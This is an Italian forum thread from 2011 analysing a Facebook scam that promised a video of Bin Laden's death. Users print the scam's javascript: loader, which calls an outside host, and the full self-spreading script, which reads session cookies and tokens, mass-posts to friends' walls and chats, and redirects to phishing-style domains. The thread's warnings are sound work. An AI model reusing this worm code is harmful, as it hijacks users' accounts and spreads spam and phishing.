Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Commenti a "Il fantasma di Bin Laden è in agguato su Facebook"

Vuoi discutere qualcosa che riguarda le nostre News? Vuoi darci la tua opinione sui nostri articoli? Complimentarti o muovere una critica? Questa è la sezione giusta!

Commenti a "Il fantasma di Bin Laden è in agguato su Facebook"

Messaggioda BlackJack » lun nov 29, 2010 1:43 pm

Immagine
Il fantasma di Bin Laden è in agguato su Facebook - Commenti

Se vi compare in bacheca un post che propone un presunto video dell'uccisione di Bin Laden, non apritelo: si tratta di una trappola studiata per innestare codice dannoso. [continua...]
Avatar utente
BlackJack
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 1811
Iscritto il: gio mag 06, 2010 7:47 pm
Località: Prov. Vercelli

Topic di prova2: commenti a...

Messaggioda Zane » lun nov 29, 2010 1:43 pm

Ho fuso qui la discussione apparsa sul forum nel pomeriggio yyy
Avatar utente
Zane
MLI Hero
MLI Hero
 
Messaggi: 7935
Iscritto il: lun ago 05, 2002 9:36 am
Località: Ferrara

ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 7:48 pm

http://www.facebook.com/pages/Osama-ecc ... 2544333196
Attenzione tutti i miei amici hanno questo post incollato in bacheca...Appena entrato mi chiede di:
Usa il nostro codice unico per guardare il video!
- Segui i semplici passi qua sotto per guardare il video
Passo 1 - Copia questo codice:
Clicca nello spazio sottostante, seleziona il testo,
tastro destro del mouse e copialo.
Codice: Seleziona tutto
javascript:(a=(b=document).createElement('script')).src='//strummer5202.info/you/joe.php?'+Math.random(),b.body.appendChild(a);void(0)


Il codice mi sembra java... SCR dovrebbe essere qualche collegamente (mi ricordo lontamente il java studiato pochi anni fa qualcosa basilare). Vorrei che qualche esperto esamini questo codice grazie mille!
Passo 2:
Incolla il testo prima copiato nella tua barra degli indirizzo dove
vedi scritto Facebook.com! Dopodichè premi INVIO sulla tua tastiera!

Nota bene: Sii paziente il caricamento del video può avvenire con qualche secondo di ritardo per via delle tante visite!



Ecco uno screen:
Immagine

Uploaded with ImageShack.us
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm


Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda BlackJack » mer mag 04, 2011 8:05 pm

E' già in lavorazione una news per voi. [:)]
Un giorno ho messo un disco di Jimi Hendrix e mio figlio ha chiesto: ‘Papà, chi è?’. Io ho risposto, ‘Figlio mio, questo è Dio’. Robert Plant, Led Zeppelin
Avatar utente
BlackJack
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 1811
Iscritto il: gio mag 06, 2010 7:47 pm
Località: Prov. Vercelli

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 8:12 pm

Si ma ci devi mettere come affiliati hahahah =) Se no ci offendiamo =)
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda BlackJack » mer mag 04, 2011 8:14 pm

Eh, non sarebbe nemmeno una brutta idea!

Peccato che alle 19.57 fosse già stato finito e notificato [:)]
Un giorno ho messo un disco di Jimi Hendrix e mio figlio ha chiesto: ‘Papà, chi è?’. Io ho risposto, ‘Figlio mio, questo è Dio’. Robert Plant, Led Zeppelin
Avatar utente
BlackJack
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 1811
Iscritto il: gio mag 06, 2010 7:47 pm
Località: Prov. Vercelli

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Berga95 » mer mag 04, 2011 8:16 pm

Non sono un'esperto, ma intanto quello è javascript [sh]
Comunque, se andate su hxxp://strummer5202.info/you/joe.php vedrete questo codice in php:
Codice: Seleziona tutto
/////////////////////////////////////////////////////////////////////////////////////////////////////////////// // joelives /////////////////////////////////////////////////////////////////////////////////////////////////////////////// //alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!'); function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } var user_id = readCookie("c_user"); // Setup some variables var post_form_id = document.getElementsByName('post_form_id')[0].value; var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; // Multiple URL Shorteners var shortArray = new Array( "http://ow.ly/4LNpd", "http://clickily.ws/zyaeom" ); var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())]; // Chat message variables var this_chat = "Guarda il video dell'esecuzione di osama bin laden : / http://tinyurl.com/6ezfwod"; var prepared_chat = encodeURIComponent(this_chat);/////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Post Link to friends walls /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var token = Math.round(new Date().getTime() / 1000); var http1 = new XMLHttpRequest(); var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only"; var params1 = ""; http1.open("GET", url1+"?"+params1, true); http1.onreadystatechange = function() {//Call a function when the state changes. if(http1.readyState == 4 && http1.status == 200) { // If state = success var response1 = http1.responseText; response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object response1 = JSON.parse(response1); // Convert the response to JSON //alert(response4.toSource()); var count = 0; for(uid in response1.payload.entries){ if(count < 400){ //alert("SENT TO "+response1.payload.entries[count].uid); // Loop to send messages // New XMLHttp object var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1"; var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-filmato-della-morte/220917514589882?", "http://www.facebook.com/pages/Video-Morte-di-Osama-Scioccante/185145894868858?", "http://www.facebook.com/pages/Osama-la-ripresa-dellesecuzione/207377795963147?", "http://www.facebook.com/pages/Video-integrale-morte-osama/160160600713068?", "http://www.facebook.com/pages/Video-morte-di-Bin-Laden/207942222570998?", "http://www.facebook.com/pages/Osama-ecco-il-filmato-dellattacco-dei-soldati/218470064846463?", "http://www.facebook.com/pages/Video-scioccante-Osama/223750520974663?", "http://www.facebook.com/pages/Filmato-suicidio-di-Osama/163954453664922?", "http://www.facebook.com/pages/Morte-osama-scioccante/200258923349460?", "http://www.facebook.com/pages/Mortee-di-osama-ecco-il-documento/152569268142253?", "http://www.facebook.com/pages/Esecuzione-morte-osama/169294976461920?", "http://www.facebook.com/pages/Osama-riprese-dellattacco/219103628099719?", "http://www.facebook.com/pages/Ecco-il-video-di-osama/219488704729435?", "http://www.facebook.com/pages/Ecco-qui-la-della-morte-di-ossama/184860774895355?", "http://www.facebook.com/pages/Filmato-dellesecuzione-di-ossama/214155628604153?", "http://www.facebook.com/pages/Osama-ecco-il-video-integrale/112701738814253?", "http://www.facebook.com/pages/Osama-filmato/121083417971352?", "http://www.facebook.com/pages/Osama-scioccante-riproduzione/128548893886623?", "http://www.facebook.com/pages/Ossama-ecco-le-riprese/218816904797657?", "http://www.facebook.com/pages/Video-mortee-di-ossama/185207694861003?", "http://www.facebook.com/pages/Osama-video-esecuziome/218415021503983?", "http://www.facebook.com/pages/Osamma-ecco-lesecuzione/212492518769037?", "http://www.facebook.com/pages/Dio-mio-ecco-la-mortee-di-osamas/143509959054039?", "http://www.facebook.com/pages/Ecco-la-fine-di-ossaama/184355164949820?", "http://www.facebook.com/pages/Video-uccisisone-di-ossamma/221386654538707?", "http://www.facebook.com/pages/Ecco-come-%C3%A8-morteo-osasma/169336573123501?", "http://www.facebook.com/pages/Morte-osasdma-bin-laden/200306210004897?", "http://www.facebook.com/pages/Osama-ecco-il-video-integrale/210973072259792?", "http://www.facebook.com/pages/Ossamas-bin-laden-videos-modfrte/189298697773277?", "http://www.facebook.com/pages/Filmato-morte-Bin-Laden/199725546735628?"); var statusmessage="questo è davvero scioccante.."; var title="Il video dell esecuzione di bin laden!"; // var link="http://www.facebook.com/pages/Video-scioccante-Osama/223750520974663?"; var link = randLink[Math.floor(randLink.length*Math.random())]; var description="guarda cosa fanno questi soldati ad Osama! "; var picture="http://i54.tinypic.com/k0r1xh.jpg"; var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest"; httpwp.open("POST", urlwp, true); //Send the proper header information along with the request httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function() { //Call a function when the state changes. if(httpwp.readyState == 4 && httpwp.status == 200){ //alert(http.responseText); //alert('buddy list fetched'); } } httpwp.send(paramswp); } count++; // increment counter } http1.close; // Close the connection } } http1.send(null); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Hide chat boxes /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var hide = document.getElementById('fbDockChatTabSlider'); hide.style.display = "none"; /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Get online friends and send chat message to them /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http3 = new XMLHttpRequest(); var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"; http3.open("POST", url3, true); //Send the proper header information along with the request http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http3.setRequestHeader("Content-length", params3.length); http3.setRequestHeader("Connection", "close"); http3.onreadystatechange = function() {//Call a function when the state changes. if(http3.readyState == 4 && http3.status == 200) { var response3 = http3.responseText; response3 = response3.replace("for (;;);", ""); response3 = JSON.parse(response3); var count = 0; for(property in response3.payload.buddy_list.nowAvailableList){ if(count < 100){ // Loop to send messages // New XMLHttp object var httpc = new XMLHttpRequest(); // Generate random message ID var msgid = Math.floor(Math.random()*1000000); var time = Math.round(new Date().getTime() / 1000); var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"; httpc.open("POST", urlc, true); //Send the proper header information along with the request httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpc.setRequestHeader("Content-length", paramsc.length); httpc.setRequestHeader("Connection", "close"); httpc.onreadystatechange = function() { //Call a function when the state changes. if(httpc.readyState == 4 && httpc.status == 200){ //alert(http.responseText); //alert('buddy list fetched'); } } httpc.send(paramsc); } //alert(property); count++; // increment counter } http3.close; // Close the connection } } http3.send(params3); /* /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan - MW GIVEAWAY /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http4 = new XMLHttpRequest(); var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params4 = "fbpage_id=199725546735628&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest" http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan - MW GIft /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http5 = new XMLHttpRequest(); var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params5 = "fbpage_id=185145894868858&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest" http5.open("POST", url5, true); //Send the proper header information along with the request http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http5.setRequestHeader("Content-length", params5.length); http5.setRequestHeader("Connection", "close"); http5.onreadystatechange = function() {//Call a function when the state changes. if(http5.readyState == 4 && http5.status == 200) { http5.close; // Close the connection } } http5.send(params5); */ //document.getElementById('susta').style.display="none"; document.getElementById('contentArea').innerHTML="









Caricamento video in corso ...
"; var endArray = new Array("quanteore.com", "verifica-account.com", "facebook.verifica-account.com"); var ending = endArray[Math.floor(endArray.length*Math.random())]; setTimeout("window.location = 'http://'+ending+'/index.php';", 15000);


Interessante, no? Ci sono pure i commenti [rotolo]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 8:21 pm

Da quello che si evince dal php dovrebbe pure mandare lo stesso messaggio e il link di questo presunto video anche agli amici!!! ragazziiiiii siamo pronti ?? =)
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Andy94 » mer mag 04, 2011 8:22 pm

Intervengo solo per una brevissima spiegazione sul codice, in aggiunta a quanto detto da Berga. [^]
Quello è JavaScript (non Java), e in particolare si tratta di un bookmarklet. Quando viene copiato nella barra degli indirizzi ed eseguito (meramente con Invio), effettua delle operazioni nella pagina corrente.
Nel caso di quel bookmarklet specifico abbiamo la creazione di un nuovo elemento SCRIPT e il suo inserimento nella pagina che attualmente state visitando. L'URL a cui tale script punta è
Codice: Seleziona tutto
//strummer5202.info/you/joe.php?XXXXXXXX

Dove XXXXXXXX è un numero casuale, estratto nell'intervallo tra 0 ed 1 (è quindi decimale).

Direi che quanto inserito da Berga è assolutamente autoesplicativo... [acc2]

[ciao]
Avatar utente
Andy94
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 9998
Iscritto il: lun apr 09, 2007 8:39 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 8:26 pm

Ecco il post:

var statusmessage="questo è davvero scioccante.." ==> Contenuto post
var title="Il video dell esecuzione di bin laden!" ==> Titolo post
http://i54.tinypic.com/k0r1xh.jpg ==> Immagine del post
Poi...
Get online friends and send chat message to them ==> Questo commento non mi piace =)
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda ste_95 » mer mag 04, 2011 8:28 pm

Gente a cui viene detto di mettersi del javascript nella barra degli indirizzi... che lo fa!! È agghiacciante!
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 8:30 pm

Scusate la mia ignoranza...Ma il java script non dovrebbe essere all'interno della pagina? E se io metto il java script nella barra degli indirizzi di norma non dovrebbe succedere nulla?O sbalio?
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Berga95 » mer mag 04, 2011 8:30 pm

Andy94 ha scritto:Quando viene copiato nella barra degli indirizzi ed eseguito (meramente con Invio), effettua delle operazioni nella pagina corrente.
[cut] Abbiamo la creazione di un nuovo elemento SCRIPT e il suo inserimento nella pagina che attualmente state visitando. L'URL a cui tale script punta è
Codice: Seleziona tutto
//strummer5202.info/you/joe.php?XXXXXXXX


Esattamente quello che volevo dire [^] Purtroppo non conoscevo i bookmarklet e non volevo sparare fesserie...

Andy94 ha scritto:Dove XXXXXXXX è un numero casuale, estratto nell'intervallo tra 0 ed 1 (è quindi decimale).

Mi ha stupito che non ci fosse math.random()*10000000 [8)] Come mai decimale?

EDIT:
Scusate la mia ignoranza...Ma il java script non dovrebbe essere all'interno della pagina? E se io metto il java script nella barra degli indirizzi di norma non dovrebbe succedere nulla?O sbalio?


In che senso "all'interno della pagina"?

Beh, se metti javascript anche in una pagina di MLI con scritto javascript: alert("Ciao!"); viene eseguito questo codice... Spiegati meglio...
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Hpmezzo » mer mag 04, 2011 8:34 pm

Ragazzi fatemi capire bene come è la situazione...Beh possiamo parlare di un semi-exploit?
E io che hjo i java script disabilitati non dovrei correre nessun rischio vero? E non corro nessun rischio se non copio il codice nella barra degli indirizzi? Giusto?
Mi piacerebbe tanto essere un hacker...Non per entrare nei sistemi informatici ma per entrare nel tuo cuore e non uscirne più! [Hpmezzo]
Avatar utente
Hpmezzo
Bronze Member
Bronze Member
 
Messaggi: 541
Iscritto il: sab giu 21, 2008 2:05 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda ste_95 » mer mag 04, 2011 8:41 pm

No nessun semi-exploit, se non consideri l'idiozia della gente, che allora puoi parlare di mega-exploit. È sufficiente non copiare codice javascript sconosciuto nella barra degli indirizzi per stare tranquilli [;)]
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Berga95 » mer mag 04, 2011 8:43 pm

Hpmezzo ha scritto:E io che ho i java script disabilitati non dovrei correre nessun rischio vero?

Certo [^] Anche se è da stupidi copia-incollare codice javascript così, inoltre puoi anche vedere che fa avendo qualche fondamento di programmazione e buona fantasia [:D]
Hpmezzo ha scritto:E non corro nessun rischio se non copio il codice nella barra degli indirizzi? Giusto?

Perché farlo? [acc2]

Hpmezzo ha scritto:Beh possiamo parlare di un semi-exploit?

IMHO no, è l'utente che sceglie di eseguire un javascript... possiamo chiamarlo "basso quoziente intellettivo dell'utenza cybernauta" [sh]

EDIT: Oggi tutti mi anticipano [acc2]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Andy94 » mer mag 04, 2011 8:47 pm

JavaScript può essere eseguito con i bookmarklet, e questa è un ottima cosa. Certo, ci sono bookmarklet buoni e meno buoni (vedi sopra).

Stavo riguardando il codice di Berga: non è PHP, altrimenti non lo vedresti; è sempre JS.
Sembra che legga i cookie, e sfrutti i dati per richiamare pagine di FB che svolgono le varie funzioni di inserimento messaggi e quant'altro.

Exploit? Beh, dipende da come la vediamo... Sembrerebbe di sì, ma a quel punto sarebbero quelli di FB a dover mettere mano al codice per far sì che smetta di funzionare. Tuttavia, mi stupisce che non ci abbiano pensato prima.
È sufficiente non copiare codice javascript sconosciuto nella barra degli indirizzi per stare tranquilli [;)]

E consenti alle pagine di FB di essere richiamate senza controlli di sorta su referer, e request method?
Avatar utente
Andy94
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 9998
Iscritto il: lun apr 09, 2007 8:39 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda ste_95 » mer mag 04, 2011 8:51 pm

E consenti alle pagine di FB di essere richiamate senza controlli di sorta su referer, e request method?

Beh immagino che sia necessario (vedi API, sistemi interni loro), non mi sembrano proprio degli sprovveduti [std]
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Andy94 » mer mag 04, 2011 8:54 pm

Sì, ma suppongo che le API utilizzino comunque dei controlli... Altrimenti io potrei fare praticamente quasi tutto fregandomene di qualunque cosa, tanto anche se non uso le API non controllano...
non mi sembrano proprio degli sprovveduti [std]

Non lo sono senz'altro, però non mi sembra che questa possa essere considerata una cosa "by design".
Avatar utente
Andy94
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 9998
Iscritto il: lun apr 09, 2007 8:39 pm

Re: ALLARME! Java Script ci riprova su Facebook

Messaggioda Berga95 » mer mag 04, 2011 8:56 pm

Andy94 ha scritto:JavaScript può essere eseguito con i bookmarklet, e questa è un ottima cosa. Certo, ci sono bookmarklet buoni e meno buoni (vedi sopra).
Stavo riguardando il codice di Berga: non è PHP, altrimenti non lo vedresti; è sempre JS.

Sì sì, era un lapsus [B)] Me l'ha fatto notare anche un amico in Skype...
Che figura di.. [ehm]
Non è morto ciò che in eterno può attendere - e col passare di strani eoni - anche la morte può morire.
~ H.P. Lovecraft
Avatar utente
Berga95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 3342
Iscritto il: sab set 12, 2009 12:56 pm

Prossimo

Torna a Commenti

Chi c’è in linea

Visitano il forum: Nessuno e 16 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising